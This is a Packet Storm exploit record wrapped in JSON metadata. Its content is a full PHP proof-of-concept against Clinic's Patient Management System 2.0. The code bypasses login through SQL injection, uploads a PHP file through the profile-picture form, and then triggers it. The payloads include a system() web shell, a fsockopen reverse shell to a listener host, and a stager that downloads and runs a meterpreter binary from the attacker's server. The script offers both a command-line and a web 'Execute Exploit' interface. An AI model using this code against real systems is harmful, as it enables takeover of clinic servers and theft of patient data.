{“lastseen”:”2025-12-10T17:38:49″,”description”:”Clinic’s Patient Management System version 2.0 proof of concept that combines SQL injection authentication bypass with an unrestricted file upload to achieve full compromise…”,”published”:”2025-12-10T00:00:00″,”modified”:”2025-12-10T00:00:00″,”type”:”packetstorm”,”title”:”\ud83d\udcc4 Clinic’s Patient Management System 2.0 Remote Code Execution”,”source”:””,”references”:””,”id”:”PACKETSTORM:212664″,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[“CVE-2022-2297″,”CVE-2025-3096″],”sourceData”:”=============================================================================================================================================\\n | # Title : Clinic’s Patient Management System 2.0 Unauthenticated Admin Access |\\n | # Author : indoushka |\\n | # Tested on : windows 11 Fr(Pro) \/ browser : Mozilla firefox 145.0.1 (64 bits) |\\n | # Vendor : https:\/\/www.sourcecodester.com\/php-clinics-patient-management-system-source-code |\\n =============================================================================================================================================\\n \\n [+] References : https:\/\/packetstorm.news\/files\/id\/194570\/ \\u0026 \\tCVE-2022-2297, CVE-2025-3096\\n \\n [+] Summary : \\n Critical unauthenticated remote code execution vulnerability chain in Clinic’s Patient Management System (v2.0) \\n \\t\\t\\t combining SQL injection authentication bypass with unrestricted file upload functionality to achieve complete system compromise.\\n \\n [+] POC : \\n \\n php poc.php or http:\/\/127.0.0.1\/poc.php \\n \\n \\u003c?php\\n \/*\\n * by : indoushka\\n *\/\\n \\n class ClinicPMSExploit {\\n private $target;\\n private $port;\\n private $ssl;\\n private $base_path;\\n private $timeout;\\n private $cookies;\\n private $delete_files;\\n \\n public function __construct($target, $port = 80, $ssl = false, $base_path = ‘\/pms\/’, $delete_files = true) {\\n $this-\\u003etarget = $target;\\n $this-\\u003eport = $port;\\n $this-\\u003essl = $ssl;\\n $this-\\u003ebase_path = rtrim($base_path, ‘\/’);\\n $this-\\u003etimeout = 30;\\n $this-\\u003ecookies = [];\\n $this-\\u003edelete_files = $delete_files;\\n }\\n \\n \/**\\n * Check if target is vulnerable\\n *\/\\n public function check() {\\n echo \\”[*] Checking Clinic Patient Management System vulnerability…\\\\n\\”;\\n \\n $res = $this-\\u003esend_request(”);\\n \\n if (!$res || $res[‘code’] != 200) {\\n echo \\”[-] Unexpected response code from server\\\\n\\”;\\n return \\”unknown\\”;\\n }\\n \\n if (strpos($res[‘body’], \\”Clinic’s Patient Management System in PHP\\”) !== false) {\\n echo \\”[+] \u2713 Clinic PMS detected\\\\n\\”;\\n \\n \/\/ Test SQL injection vulnerability\\n if ($this-\\u003etest_sqli()) {\\n echo \\”[+] \u2713 SQL injection vulnerability confirmed\\\\n\\”;\\n return \\”vulnerable\\”;\\n } else {\\n echo \\”[-] SQL injection failed – application might be patched\\\\n\\”;\\n return \\”safe\\”;\\n }\\n }\\n \\n echo \\”[-] Clinic PMS not detected\\\\n\\”;\\n return \\”safe\\”;\\n }\\n \\n \/**\\n * Test SQL injection vulnerability\\n *\/\\n private function test_sqli() {\\n $login_data = [\\n ‘user_name’ =\\u003e \\”‘ or ‘1’=’1′ LIMIT 1;–\\”,\\n ‘password’ =\\u003e ”,\\n ‘login’ =\\u003e ”\\n ];\\n \\n $res = $this-\\u003esend_request(‘index.php’, ‘POST’, [], http_build_query($login_data), [\\n ‘Content-Type: application\/x-www-form-urlencoded’\\n ], true);\\n \\n if ($res \\u0026\\u0026 $res[‘code’] == 302) {\\n $location = $this-\\u003eextract_header($res[‘headers’], ‘Location’);\\n if ($location \\u0026\\u0026 strpos($location, ‘dashboard.php’) !== false) {\\n return true;\\n }\\n }\\n \\n return false;\\n }\\n \\n \/**\\n * Login using SQL injection\\n *\/\\n private function login_sqli() {\\n echo \\”[*] Logging in using SQL injection…\\\\n\\”;\\n \\n $login_data = [\\n ‘user_name’ =\\u003e \\”‘ or ‘1’=’1′ LIMIT 1;–\\”,\\n ‘password’ =\\u003e ”,\\n ‘login’ =\\u003e ”\\n ];\\n \\n $res = $this-\\u003esend_request(‘index.php’, ‘POST’, [], http_build_query($login_data), [\\n ‘Content-Type: application\/x-www-form-urlencoded’\\n ], true);\\n \\n if (!$res || $res[‘code’] != 302) {\\n echo \\”[-] SQL injection login failed\\\\n\\”;\\n return false;\\n }\\n \\n $location = $this-\\u003eextract_header($res[‘headers’], ‘Location’);\\n if ($location \\u0026\\u0026 strpos($location, ‘dashboard.php’) !== false) {\\n echo \\”[+] Successfully logged in using SQL injection\\\\n\\”;\\n return true;\\n }\\n \\n echo \\”[-] SQL injection login failed – unexpected redirect\\\\n\\”;\\n return false;\\n }\\n \\n \/**\\n * Upload PHP payload via profile picture upload\\n *\/\\n private function upload_payload($payload_type = ‘cmd’, $lhost = null, $lport = null) {\\n echo \\”[*] Uploading PHP payload…\\\\n\\”;\\n \\n $username = $this-\\u003erandom_text(8);\\n $password = $this-\\u003erandom_text(8);\\n $filename = $this-\\u003erandom_text(8) . ‘.php’;\\n \\n \/\/ Generate PHP payload\\n $php_payload = $this-\\u003egenerate_php_payload($payload_type, $lhost, $lport);\\n \\n $boundary = \\”—-WebKitFormBoundary\\” . $this-\\u003erandom_text(16);\\n \\n $data = \\”–{$boundary}\\\\r\\\\n\\”;\\n $data .= \\”Content-Disposition: form-data; name=\\\\\\”hidden_id\\\\\\”\\\\r\\\\n\\\\r\\\\n\\”;\\n $data .= \\”1\\\\r\\\\n\\”;\\n $data .= \\”–{$boundary}\\\\r\\\\n\\”;\\n \\n $data .= \\”Content-Disposition: form-data; name=\\\\\\”display_name\\\\\\”\\\\r\\\\n\\\\r\\\\n\\”;\\n $data .= \\”{$username}\\\\r\\\\n\\”;\\n $data .= \\”–{$boundary}\\\\r\\\\n\\”;\\n \\n $data .= \\”Content-Disposition: form-data; name=\\\\\\”username\\\\\\”\\\\r\\\\n\\\\r\\\\n\\”;\\n $data .= \\”{$username}\\\\r\\\\n\\”;\\n $data .= \\”–{$boundary}\\\\r\\\\n\\”;\\n \\n $data .= \\”Content-Disposition: form-data; name=\\\\\\”password\\\\\\”\\\\r\\\\n\\\\r\\\\n\\”;\\n $data .= \\”{$password}\\\\r\\\\n\\”;\\n $data .= \\”–{$boundary}\\\\r\\\\n\\”;\\n \\n $data .= \\”Content-Disposition: form-data; name=\\\\\\”profile_picture\\\\\\”; filename=\\\\\\”{$filename}\\\\\\”\\\\r\\\\n\\”;\\n $data .= \\”Content-Type: application\/x-php\\\\r\\\\n\\\\r\\\\n\\”;\\n $data .= \\”{$php_payload}\\\\r\\\\n\\”;\\n $data .= \\”–{$boundary}\\\\r\\\\n\\”;\\n \\n $data .= \\”Content-Disposition: form-data; name=\\\\\\”save_user\\\\\\”\\\\r\\\\n\\\\r\\\\n\\”;\\n $data .= \\”\\\\r\\\\n\\”;\\n $data .= \\”–{$boundary}–\\\\r\\\\n\\”;\\n \\n $headers = [\\n \\”Content-Type: multipart\/form-data; boundary={$boundary}\\”,\\n \\”Content-Length: \\” . strlen($data)\\n ];\\n \\n $res = $this-\\u003esend_request(‘update_user.php’, ‘POST’, [‘user_id’ =\\u003e ‘1’], $data, $headers, true);\\n \\n if ($res \\u0026\\u0026 $res[‘code’] == 302) {\\n $location = $this-\\u003eextract_header($res[‘headers’], ‘Location’);\\n if ($location \\u0026\\u0026 strpos($location, ‘congratulation.php?goto_page=users.php\\u0026message=user update successfully’) !== false) {\\n echo \\”[+] PHP payload uploaded successfully: {$filename}\\\\n\\”;\\n return $filename;\\n }\\n }\\n \\n echo \\”[-] Payload upload failed\\\\n\\”;\\n return false;\\n }\\n \\n \/**\\n * Generate PHP payload\\n *\/\\n private function generate_php_payload($type, $lhost, $lport) {\\n switch ($type) {\\n case ‘reverse_shell’:\\n if (!$lhost || !$lport) {\\n return $this-\\u003egenerate_cmd_shell();\\n }\\n return $this-\\u003egenerate_reverse_shell($lhost, $lport);\\n \\n case ‘web_shell’:\\n return $this-\\u003egenerate_web_shell();\\n \\n case ‘meterpreter’:\\n if (!$lhost || !$lport) {\\n return $this-\\u003egenerate_cmd_shell();\\n }\\n return $this-\\u003egenerate_meterpreter_stager($lhost, $lport);\\n \\n case ‘cmd’:\\n default:\\n return $this-\\u003egenerate_cmd_shell();\\n }\\n }\\n \\n \/**\\n * Generate command shell\\n *\/\\n private function generate_cmd_shell() {\\n return ‘\\u003c?php if(isset($_GET[\\”cmd\\”])){ system($_GET[\\”cmd\\”]); } ?\\u003e’;\\n }\\n \\n \/**\\n * Generate reverse shell\\n *\/\\n private function generate_reverse_shell($lhost, $lport) {\\n $payload = ‘\\u003c?php ‘;\\n $payload .= ‘$sock=fsockopen(\\”‘ . $lhost . ‘\\”,’ . $lport . ‘);’;\\n $payload .= ‘exec(\\”\/bin\/sh -i \\u003c\\u00263 \\u003e\\u00263 2\\u003e\\u00263\\”);’;\\n $payload .= ‘?\\u003e’;\\n return $payload;\\n }\\n \\n \/**\\n * Generate web shell\\n *\/\\n private function generate_web_shell() {\\n return ‘\\u003c?php if(isset($_POST[\\”cmd\\”])){ echo \\”\\u003cpre\\u003e\\”; system($_POST[\\”cmd\\”]); echo \\”\\u003c\/pre\\u003e\\”; } ?\\u003e’;\\n }\\n \\n \/**\\n * Generate meterpreter stager\\n *\/\\n private function generate_meterpreter_stager($lhost, $lport) {\\n $payload = ‘\\u003c?php ‘;\\n $payload .= ‘file_put_contents(\\”\/tmp\/meterpreter.elf\\”, file_get_contents(\\”http:\/\/’ . $lhost . ‘:8080\/meterpreter.elf\\”));’;\\n $payload .= ‘chmod(\\”\/tmp\/meterpreter.elf\\”, 0755);’;\\n $payload .= ‘system(\\”\/tmp\/meterpreter.elf\\”);’;\\n $payload .= ‘?\\u003e’;\\n return $payload;\\n }\\n \\n \/**\\n * Extract uploaded file path\\n *\/\\n private function extract_payload_path() {\\n echo \\”[*] Extracting uploaded payload path…\\\\n\\”;\\n \\n $res = $this-\\u003esend_request(‘update_user.php’, ‘GET’, [‘user_id’ =\\u003e ‘1’]);\\n \\n if (!$res || $res[‘code’] != 200) {\\n echo \\”[-] Failed to extract payload path\\\\n\\”;\\n return false;\\n }\\n \\n \/\/ Extract image src from HTML\\n if (preg_match(‘\/\\u003cimg[^\\u003e]*alt=\\”User Image\\”[^\\u003e]*src=\\”([^\\”]+)\\”\/’, $res[‘body’], $matches)) {\\n $payload_path = $matches[1];\\n echo \\”[+] Found payload path: {$payload_path}\\\\n\\”;\\n return $payload_path;\\n }\\n \\n echo \\”[-] Could not find payload path in response\\\\n\\”;\\n return false;\\n }\\n \\n \/**\\n * Trigger the payload\\n *\/\\n private function trigger_payload($payload_path) {\\n echo \\”[*] Triggering payload execution…\\\\n\\”;\\n \\n if (!$payload_path) {\\n echo \\”[-] No payload path provided\\\\n\\”;\\n return false;\\n }\\n \\n $res = $this-\\u003esend_request($payload_path, ‘GET’);\\n \\n if ($res) {\\n echo \\”[+] Payload triggered – HTTP {$res[‘code’]}\\\\n\\”;\\n \\n if ($this-\\u003edelete_files) {\\n echo \\”[*] Note: File cleanup would be performed in full implementation\\\\n\\”;\\n }\\n \\n return true;\\n }\\n \\n echo \\”[-] Failed to trigger payload\\\\n\\”;\\n return false;\\n }\\n \\n \/**\\n * Logout from the application\\n *\/\\n private function logout() {\\n echo \\”[*] Logging out…\\\\n\\”;\\n \\n $res = $this-\\u003esend_request(‘logout.php’, ‘GET’);\\n \\n if ($res \\u0026\\u0026 $res[‘code’] == 302) {\\n $location = $this-\\u003eextract_header($res[‘headers’], ‘Location’);\\n if ($location \\u0026\\u0026 strpos($location, ‘index.php’) !== false) {\\n echo \\”[+] Successfully logged out\\\\n\\”;\\n $this-\\u003ecookies = []; \/\/ Clear cookies\\n return true;\\n }\\n }\\n \\n echo \\”[-] Logout failed\\\\n\\”;\\n return false;\\n }\\n \\n \/**\\n * Execute full exploit chain\\n *\/\\n public function exploit($payload_type = ‘cmd’, $lhost = null, $lport = null) {\\n echo \\”[*] Starting Clinic PMS exploitation chain…\\\\n\\”;\\n \\n \/\/ Step 1: Login via SQL injection\\n if (!$this-\\u003elogin_sqli()) {\\n echo \\”[-] Exploitation failed at login stage\\\\n\\”;\\n return false;\\n }\\n \\n \/\/ Step 2: Upload payload\\n $filename = $this-\\u003eupload_payload($payload_type, $lhost, $lport);\\n if (!$filename) {\\n echo \\”[-] Exploitation failed at payload upload stage\\\\n\\”;\\n return false;\\n }\\n \\n \/\/ Step 3: Extract payload path\\n $payload_path = $this-\\u003eextract_payload_path();\\n if (!$payload_path) {\\n echo \\”[-] Exploitation failed at path extraction stage\\\\n\\”;\\n return false;\\n }\\n \\n \/\/ Step 4: Trigger payload\\n if ($this-\\u003etrigger_payload($payload_path)) {\\n echo \\”[+] \u2713 Exploitation completed successfully\\\\n\\”;\\n echo \\”[*] Payload should be executed\\\\n\\”;\\n return true;\\n }\\n \\n echo \\”[-] Exploitation failed at payload trigger stage\\\\n\\”;\\n return false;\\n }\\n \\n \/**\\n * Send HTTP request\\n *\/\\n private function send_request($path, $method = ‘GET’, $params = [], $data = null, $custom_headers = [], $save_cookies = false) {\\n $url = $this-\\u003ebuild_url($path);\\n \\n if ($method == ‘GET’ \\u0026\\u0026 !empty($params)) {\\n $url .= ‘?’ . http_build_query($params);\\n }\\n \\n $ch = curl_init();\\n curl_setopt_array($ch, [\\n CURLOPT_URL =\\u003e $url,\\n CURLOPT_RETURNTRANSFER =\\u003e true,\\n CURLOPT_TIMEOUT =\\u003e $this-\\u003etimeout,\\n CURLOPT_SSL_VERIFYPEER =\\u003e false,\\n CURLOPT_SSL_VERIFYHOST =\\u003e false,\\n CURLOPT_USERAGENT =\\u003e ‘Mozilla\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\/537.36’,\\n CURLOPT_HEADER =\\u003e true,\\n CURLOPT_CUSTOMREQUEST =\\u003e $method,\\n CURLOPT_FOLLOWLOCATION =\\u003e false\\n ]);\\n \\n \/\/ Add POST data if provided\\n if ($method == ‘POST’ \\u0026\\u0026 $data) {\\n curl_setopt($ch, CURLOPT_POSTFIELDS, $data);\\n }\\n \\n \/\/ Build headers\\n $headers = array_merge([\\n ‘User-Agent: Mozilla\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\/537.36’\\n ], $custom_headers);\\n \\n \/\/ Add cookies if available\\n $cookie_header = $this-\\u003ebuild_cookie_header();\\n if ($cookie_header) {\\n $headers[] = $cookie_header;\\n }\\n \\n curl_setopt($ch, CURLOPT_HTTPHEADER, $headers);\\n \\n $response = curl_exec($ch);\\n $http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);\\n \\n \/\/ Save cookies if requested\\n if ($save_cookies \\u0026\\u0026 $response) {\\n $this-\\u003eextract_cookies($response);\\n }\\n \\n curl_close($ch);\\n \\n if ($response) {\\n $header_size = curl_getinfo($ch, CURLINFO_HEADER_SIZE);\\n $headers = substr($response, 0, $header_size);\\n $body = substr($response, $header_size);\\n \\n return [\\n ‘code’ =\\u003e $http_code,\\n ‘headers’ =\\u003e $headers,\\n ‘body’ =\\u003e $body\\n ];\\n }\\n \\n return false;\\n }\\n \\n \/**\\n * Extract cookies from response headers\\n *\/\\n private function extract_cookies($response) {\\n if (preg_match_all(‘\/Set-Cookie:\\\\s*([^=]+)=([^;]+)\/i’, $response, $matches)) {\\n for ($i = 0; $i \\u003c count($matches[1]); $i++) {\\n $this-\\u003ecookies[trim($matches[1][$i])] = $matches[2][$i];\\n }\\n }\\n }\\n \\n \/**\\n * Extract specific header from headers string\\n *\/\\n private function extract_header($headers, $header_name) {\\n $pattern = ‘\/^’ . $header_name . ‘:\\\\s*(.*)$\/mi’;\\n if (preg_match($pattern, $headers, $matches)) {\\n return trim($matches[1]);\\n }\\n return null;\\n }\\n \\n \/**\\n * Build cookie header from stored cookies\\n *\/\\n private function build_cookie_header() {\\n if (empty($this-\\u003ecookies)) {\\n return null;\\n }\\n \\n $cookie_parts = [];\\n foreach ($this-\\u003ecookies as $name =\\u003e $value) {\\n $cookie_parts[] = \\”{$name}={$value}\\”;\\n }\\n \\n return ‘Cookie: ‘ . implode(‘; ‘, $cookie_parts);\\n }\\n \\n \/**\\n * Generate random text\\n *\/\\n private function random_text($length = 8) {\\n $chars = ‘abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789’;\\n $result = ”;\\n for ($i = 0; $i \\u003c $length; $i++) {\\n $result .= $chars[rand(0, strlen($chars) – 1)];\\n }\\n return $result;\\n }\\n \\n \/**\\n * Build full URL\\n *\/\\n private function build_url($path) {\\n $protocol = $this-\\u003essl ? ‘https’ : ‘http’;\\n $full_path = $this-\\u003ebase_path . $path;\\n return \\”{$protocol}:\/\/{$this-\\u003etarget}:{$this-\\u003eport}{$full_path}\\”;\\n }\\n }\\n \\n \/\/ CLI Interface\\n if (php_sapi_name() === ‘cli’) {\\n echo \\”\\n \u2554\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2557\\n \u2551 Clinic Patient Management System RCE \u2551\\n \u2551 CVE-2022-2297 \\u0026 CVE-2025-3096 \u2551\\n \u2551 PHP Implementation \u2551\\n \u255a\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u255d\\n \\n \\\\n\\”;\\n \\n $options = getopt(\\”t:p:s:u:cP:L:H:\\”, [\\n \\”target:\\”,\\n \\”port:\\”,\\n \\”ssl\\”,\\n \\”uri:\\”,\\n \\”check\\”,\\n \\”payload:\\”,\\n \\”lhost:\\”,\\n \\”lport:\\”\\n ]);\\n \\n $target = $options[‘t’] ?? $options[‘target’] ?? null;\\n $port = $options[‘p’] ?? $options[‘port’] ?? 80;\\n $ssl = isset($options[‘s’]) || isset($options[‘ssl’]);\\n $base_uri = $options[‘u’] ?? $options[‘uri’] ?? ‘\/pms\/’;\\n $check_only = isset($options[‘c’]) || isset($options[‘check’]);\\n $payload_type = $options[‘P’] ?? $options[‘payload’] ?? ‘cmd’;\\n $lhost = $options[‘H’] ?? $options[‘lhost’] ?? null;\\n $lport = $options[‘L’] ?? $options[‘lport’] ?? 4444;\\n \\n if (!$target) {\\n echo \\”Usage: php clinic_pms_exploit.php [options]\\\\n\\”;\\n echo \\”Options:\\\\n\\”;\\n echo \\” -t, –target Target host (required)\\\\n\\”;\\n echo \\” -p, –port Target port (default: 80)\\\\n\\”;\\n echo \\” -s, –ssl Use SSL (default: false)\\\\n\\”;\\n echo \\” -u, –uri Base URI path (default: \/pms\/)\\\\n\\”;\\n echo \\” -c, –check Check only (don’t exploit)\\\\n\\”;\\n echo \\” -P, –payload Payload type: cmd, reverse_shell, web_shell, meterpreter (default: cmd)\\\\n\\”;\\n echo \\” -H, –lhost Listener host for reverse shell\\\\n\\”;\\n echo \\” -L, –lport Listener port for reverse shell (default: 4444)\\\\n\\”;\\n echo \\”\\\\nExamples:\\\\n\\”;\\n echo \\” php clinic_pms_exploit.php -t 192.168.1.100 -c\\\\n\\”;\\n echo \\” php clinic_pms_exploit.php -t clinic.example.com -P reverse_shell -H 10.0.0.5 -L 4444\\\\n\\”;\\n exit(1);\\n }\\n \\n $exploit = new ClinicPMSExploit($target, $port, $ssl, $base_uri);\\n \\n if ($check_only) {\\n $result = $exploit-\\u003echeck();\\n echo \\”\\\\n[*] Result: {$result}\\\\n\\”;\\n } else {\\n if ($exploit-\\u003eexploit($payload_type, $lhost, $lport)) {\\n echo \\”[+] Exploitation completed successfully\\\\n\\”;\\n } else {\\n echo \\”[-] Exploitation failed\\\\n\\”;\\n }\\n }\\n \\n } else {\\n \/\/ Web Interface\\n $action = $_POST[‘action’] ?? ”;\\n \\n if ($action === ‘check’ || $action === ‘exploit’) {\\n $target = $_POST[‘target’] ?? ”;\\n $port = $_POST[‘port’] ?? 80;\\n $ssl = isset($_POST[‘ssl’]);\\n $base_uri = $_POST[‘uri’] ?? ‘\/pms\/’;\\n $payload_type = $_POST[‘payload_type’] ?? ‘cmd’;\\n $lhost = $_POST[‘lhost’] ?? ”;\\n $lport = $_POST[‘lport’] ?? 4444;\\n \\n if (empty($target)) {\\n echo \\”\\u003cdiv style=’color: red; padding: 10px; border: 1px solid red; margin: 10px;’\\u003eTarget host is required\\u003c\/div\\u003e\\”;\\n } else {\\n $exploit = new ClinicPMSExploit($target, $port, $ssl, $base_uri);\\n \\n ob_start();\\n if ($action === ‘check’) {\\n $exploit-\\u003echeck();\\n } else {\\n $exploit-\\u003eexploit($payload_type, $lhost, $lport);\\n }\\n $output = ob_get_clean();\\n \\n echo \\”\\u003cpre style=’background: #f4f4f4; padding: 15px; border: 1px solid #ddd; border-radius: 4px;’\\u003e$output\\u003c\/pre\\u003e\\”;\\n }\\n \\n echo ‘\\u003ca href=\\”‘ . htmlspecialchars($_SERVER[‘PHP_SELF’]) . ‘\\” style=\\”display: inline-block; padding: 10px 20px; background: #007cba; color: white; text-decoration: none; border-radius: 4px; margin: 10px 0;\\”\\u003eBack to Form\\u003c\/a\\u003e’;\\n \\n } else {\\n \/\/ Display the form\\n echo ‘\\u003c!DOCTYPE html\\u003e\\n \\u003chtml\\u003e\\n \\u003chead\\u003e\\n \\u003ctitle\\u003eClinic Patient Management System RCE\\u003c\/title\\u003e\\n \\u003cmeta charset=\\”UTF-8\\”\\u003e\\n \\u003cstyle\\u003e\\n body { \\n font-family: Arial, sans-serif; \\n margin: 0; \\n padding: 20px; \\n background: #f5f5f5;\\n }\\n .container { \\n max-width: 800px; \\n margin: 0 auto; \\n background: white;\\n padding: 30px;\\n border-radius: 8px;\\n box-shadow: 0 2px 10px rgba(0,0,0,0.1);\\n }\\n h1 { \\n color: #333; \\n border-bottom: 2px solid #007cba;\\n padding-bottom: 10px;\\n }\\n h3 {\\n color: #666;\\n }\\n .form-group { \\n margin-bottom: 20px; \\n }\\n label { \\n display: block; \\n margin-bottom: 8px; \\n font-weight: bold;\\n color: #333;\\n }\\n input[type=\\”text\\”], select { \\n width: 100%; \\n padding: 10px; \\n border: 1px solid #ddd; \\n border-radius: 4px; \\n box-sizing: border-box;\\n font-size: 14px;\\n }\\n .checkbox-group {\\n display: flex;\\n align-items: center;\\n gap: 10px;\\n }\\n button { \\n background: #007cba; \\n color: white; \\n padding: 12px 25px; \\n border: none; \\n border-radius: 4px; \\n cursor: pointer; \\n margin-right: 10px;\\n font-size: 16px;\\n transition: background 0.3s;\\n }\\n button:hover {\\n background: #005a87;\\n }\\n .danger { \\n background: #dc3545; \\n }\\n .danger:hover {\\n background: #c82333;\\n }\\n .info { \\n background: #17a2b8; \\n }\\n .info:hover {\\n background: #138496;\\n }\\n .warning-box {\\n background: #fff3cd;\\n border: 1px solid #ffeaa7;\\n color: #856404;\\n padding: 15px;\\n border-radius: 4px;\\n margin: 20px 0;\\n }\\n .info-box {\\n background: #d1ecf1;\\n border: 1px solid #bee5eb;\\n color: #0c5460;\\n padding: 15px;\\n border-radius: 4px;\\n margin: 20px 0;\\n }\\n \\u003c\/style\\u003e\\n \\u003c\/head\\u003e\\n \\u003cbody\\u003e\\n \\u003cdiv class=\\”container\\”\\u003e\\n \\u003ch1\\u003eClinic Patient Management System RCE\\u003c\/h1\\u003e\\n \\u003ch3\\u003eCVE-2022-2297 \\u0026 CVE-2025-3096 – SQLi to RCE\\u003c\/h3\\u003e\\n \\n \\u003cdiv class=\\”warning-box\\”\\u003e\\n \\u003cstrong\\u003e\u26a0\ufe0f Educational Use Only:\\u003c\/strong\\u003e This tool demonstrates critical vulnerabilities in Clinic PMS.\\n Use only on systems you own or have explicit permission to test.\\n \\u003c\/div\\u003e\\n \\n \\u003cform method=\\”post\\”\\u003e\\n \\u003cdiv class=\\”form-group\\”\\u003e\\n \\u003clabel for=\\”target\\”\\u003eTarget Host:\\u003c\/label\\u003e\\n \\u003cinput type=\\”text\\” id=\\”target\\” name=\\”target\\” placeholder=\\”192.168.1.100 or clinic.example.com\\” required\\u003e\\n \\u003c\/div\\u003e\\n \\n \\u003cdiv class=\\”form-group\\”\\u003e\\n \\u003clabel for=\\”port\\”\\u003ePort:\\u003c\/label\\u003e\\n \\u003cinput type=\\”text\\” id=\\”port\\” name=\\”port\\” value=\\”80\\”\\u003e\\n \\u003c\/div\\u003e\\n \\n \\u003cdiv class=\\”form-group\\”\\u003e\\n \\u003clabel for=\\”uri\\”\\u003eBase URI:\\u003c\/label\\u003e\\n \\u003cinput type=\\”text\\” id=\\”uri\\” name=\\”uri\\” value=\\”\/pms\/\\”\\u003e\\n \\u003c\/div\\u003e\\n \\n \\u003cdiv class=\\”form-group\\”\\u003e\\n \\u003cdiv class=\\”checkbox-group\\”\\u003e\\n \\u003cinput type=\\”checkbox\\” id=\\”ssl\\” name=\\”ssl\\”\\u003e\\n \\u003clabel for=\\”ssl\\” style=\\”display: inline; font-weight: normal;\\”\\u003eUse SSL\\u003c\/label\\u003e\\n \\u003c\/div\\u003e\\n \\u003c\/div\\u003e\\n \\n \\u003cdiv class=\\”form-group\\”\\u003e\\n \\u003clabel for=\\”payload_type\\”\\u003ePayload Type:\\u003c\/label\\u003e\\n \\u003cselect id=\\”payload_type\\” name=\\”payload_type\\”\\u003e\\n \\u003coption value=\\”cmd\\”\\u003eCommand Shell\\u003c\/option\\u003e\\n \\u003coption value=\\”reverse_shell\\”\\u003eReverse Shell\\u003c\/option\\u003e\\n \\u003coption value=\\”web_shell\\”\\u003eWeb Shell\\u003c\/option\\u003e\\n \\u003coption value=\\”meterpreter\\”\\u003eMeterpreter\\u003c\/option\\u003e\\n \\u003c\/select\\u003e\\n \\u003c\/div\\u003e\\n \\n \\u003cdiv class=\\”form-group\\”\\u003e\\n \\u003clabel for=\\”lhost\\”\\u003eListener Host (for reverse shell):\\u003c\/label\\u003e\\n \\u003cinput type=\\”text\\” id=\\”lhost\\” name=\\”lhost\\” placeholder=\\”Your IP address: 192.168.1.100\\”\\u003e\\n \\u003c\/div\\u003e\\n \\n \\u003cdiv class=\\”form-group\\”\\u003e\\n \\u003clabel for=\\”lport\\”\\u003eListener Port (for reverse shell):\\u003c\/label\\u003e\\n \\u003cinput type=\\”text\\” id=\\”lport\\” name=\\”lport\\” value=\\”4444\\”\\u003e\\n \\u003c\/div\\u003e\\n \\n \\u003cbutton type=\\”submit\\” name=\\”action\\” value=\\”check\\” class=\\”info\\”\\u003eCheck Vulnerability\\u003c\/button\\u003e\\n \\u003cbutton type=\\”submit\\” name=\\”action\\” value=\\”exploit\\” class=\\”danger\\”\\u003eExecute Exploit\\u003c\/button\\u003e\\n \\u003c\/form\\u003e\\n \\n \\u003cdiv class=\\”info-box\\”\\u003e\\n \\u003ch3\\u003eAbout the CVEs:\\u003c\/h3\\u003e\\n \\u003cp\\u003e\\u003cstrong\\u003eCVE-2022-2297:\\u003c\/strong\\u003e SQL Injection in login portal\\u003c\/p\\u003e\\n \\u003cp\\u003e\\u003cstrong\\u003eCVE-2025-3096:\\u003c\/strong\\u003e File upload vulnerability in user profile\\u003c\/p\\u003e\\n \\u003cp\\u003e\\u003cstrong\\u003eAffected:\\u003c\/strong\\u003e Clinic Patient Management System 1.0\/2.0\\u003c\/p\\u003e\\n \\u003cp\\u003e\\u003cstrong\\u003eAuthentication:\\u003c\/strong\\u003e None required (SQL injection bypass)\\u003c\/p\\u003e\\n \\u003cp\\u003e\\u003cstrong\\u003eImpact:\\u003c\/strong\\u003e Remote Code Execution\\u003c\/p\\u003e\\n \\u003cp\\u003e\\u003cstrong\\u003eExploit Chain:\\u003c\/strong\\u003e SQL Injection \u2192 Admin Login \u2192 File Upload \u2192 RCE\\u003c\/p\\u003e\\n \\u003c\/div\\u003e\\n \\u003c\/div\\u003e\\n \\u003c\/body\\u003e\\n \\u003c\/html\\u003e’;\\n }\\n }\\n ?\\u003e\\n \\n Greetings to :=====================================================================================\\n jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|\\n ===================================================================================================”,”sourceHref”:”https:\/\/packetstorm.news\/download\/212664″,”cvss”:{“score”:9.3,”severity”:”CRITICAL”,”vector”:”CVSS:4.0\/AV:N\/AC:L\/AT:N\/PR:N\/UI:N\/VC:H\/SC:N\/VI:H\/SI:N\/VA:N\/SA:N”,”version”:”4.0″},”cvss2″:{},”cvss3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””,”cvssV3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””}},”href”:”https:\/\/packetstorm.news\/files\/id\/212664\/”,”category_name”:”Exploit”,”post_link”:””,”product”:””,”version”:””,”vendor”:””,”ai_description”:””,”ai_severity”:””,”ai_vendor”:””,”ai_product”:””,”ai_version”:””,”ai_score”:0}<\/p>\n","protected":false},"excerpt":{"rendered":"
